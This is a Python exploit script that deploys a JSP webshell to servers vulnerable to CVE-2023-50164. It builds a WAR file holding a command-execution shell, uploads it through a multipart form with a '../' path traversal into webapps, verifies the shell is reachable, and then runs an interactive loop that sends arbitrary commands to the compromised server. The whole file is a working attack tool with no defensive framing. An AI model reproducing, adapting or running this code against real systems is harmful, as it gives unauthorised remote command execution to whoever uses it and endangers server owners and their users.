import os import sys import time import string import random import argparse import requests import logging from urllib.parse import urlparse, urlunparse from requests_toolbelt import MultipartEncoder from requests.exceptions import RequestException, Timeout # Configure logging logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s') logger = logging.getLogger(__name__) # Constants MAX_RETRIES = 8 RETRY_DELAY = 2 TIMEOUT = 10 FORM_FIELD = "upload" WEBSHELL = "cmdexec" WEBSHELL_WAR = f"{WEBSHELL}.war" PATH_LEVELS = 2 # JSP payload with enhanced command handling JSP_CODE = """<%@ page import="java.io.*, java.util.*" %> <% String cmd = request.getParameter("cmd"); StringBuilder result = new StringBuilder(); if (cmd != null && !cmd.trim().isEmpty()) { try { ProcessBuilder pb = new ProcessBuilder(cmd.split("\\s+")); pb.redirectErrorStream(true); Process proc = pb.start(); BufferedReader reader = new BufferedReader(new InputStreamReader(proc.getInputStream())); String line; while ((line = reader.readLine()) != null) { result.append(line).append("\\n"); } reader.close(); proc.waitFor(); } catch (Exception e) { result.append("Error: ").append(e.getMessage()); } } else { result.append("Enter a command."); } %> <%=result.toString() %> """ def build_base_url(url): """Generate base URL from the input URL.""" parsed = urlparse(url) return urlunparse((parsed.scheme, parsed.netloc, "", "", "", "")) def generate_war(): """Create WAR file containing the JSP webshell.""" jsp_file = f"{WEBSHELL}.jsp" try: with open(jsp_file, "w") as f: f.write(JSP_CODE) logger.info(f"Wrote JSP to {jsp_file}") if not os.path.exists(WEBSHELL_WAR): os.system(f"jar -cvf {WEBSHELL_WAR} {jsp_file}") logger.info(f"Created WAR: {WEBSHELL_WAR}") else: logger.info(f"Reusing existing WAR: {WEBSHELL_WAR}") if os.path.exists(jsp_file): os.remove(jsp_file) logger.info(f"Removed temporary JSP: {jsp_file}") except Exception as e: logger.error(f"WAR generation failed: {e}") sys.exit(1) def upload_webshell(url): """Upload the WAR file to the target server.""" generate_war() if not os.path.exists(WEBSHELL_WAR): logger.error(f"WAR file missing: {WEBSHELL_WAR}") sys.exit(1) deploy_path = f"{'../' * (PATH_LEVELS-1)}webapps/{WEBSHELL_WAR}" try: with open(WEBSHELL_WAR, "rb") as war_file: war_data = war_file.read() fields = { FORM_FIELD.capitalize(): ("shell.war", war_data, "application/octet-stream"), f"{FORM_FIELD}FileName": deploy_path } boundary = '----ExploitBoundary' + ''.join(random.choices(string.ascii_letters + string.digits, k=16)) encoder = MultipartEncoder(fields=fields, boundary=boundary) response = requests.post(url, headers={"Content-Type": encoder.content_type}, data=encoder, timeout=TIMEOUT) if response.status_code == 200: logger.info(f"Uploaded {WEBSHELL_WAR} successfully") else: logger.error(f"Upload failed with status {response.status_code}") sys.exit(1) except RequestException as e: logger.error(f"Upload error: {e}") sys.exit(1) def check_webshell(url): """Check if the webshell is accessible.""" for attempt in range(1, MAX_RETRIES + 1): try: response = requests.get(url, timeout=TIMEOUT, verify=False) if response.status_code == 200: logger.info("Webshell connection established") return True else: logger.warning(f"Attempt {attempt}: Status {response.status_code}") except (Timeout, RequestException) as e: logger.warning(f"Attempt {attempt}: Connection error - {e}") if attempt < MAX_RETRIES: time.sleep(RETRY_DELAY) logger.error(f"Failed to connect after {MAX_RETRIES} attempts") return False def interactive_shell(url): """Run an interactive shell with the webshell.""" if not check_webshell(url): sys.exit(1) logger.info("Interactive shell started. Use 'quit' or 'exit' to stop.") while True: try: cmd = input("\033[94mExec\033[0m > ").strip() if cmd.lower() in ['quit', 'exit']: logger.info("Exiting shell") break response = requests.get(f"{url}?cmd={cmd}", verify=False, timeout=TIMEOUT) if response.status_code == 200: output = response.text.strip() print(output if output else "Command executed (no output)") else: logger.warning(f"Command failed with status {response.status_code}") except (RequestException, Timeout) as e: logger.error(f"Shell error: {e}") sys.exit(1) except KeyboardInterrupt: logger.info("Shell interrupted") break except Exception as e: logger.error(f"Unexpected shell error: {e}") sys.exit(1) def main(): parser = argparse.ArgumentParser( description="Deploy a webshell to a vulnerable server using CVE-2023-50164." ) parser.add_argument("--url", required=True, help="Upload endpoint URL (http or https)") args = parser.parse_args() if not args.url.lower().startswith(('http://', 'https://')): logger.error("URL must start with http:// or https://") sys.exit(1) logger.info("Initiating webshell deployment") upload_webshell(args.url) shell_url = f"{build_base_url(args.url)}/{WEBSHELL}/{WEBSHELL}.jsp" # logger.info(f"Webshell URL: {shell_url}?cmd=") <-- removed as requested interactive_shell(shell_url) if __name__ == "__main__": main()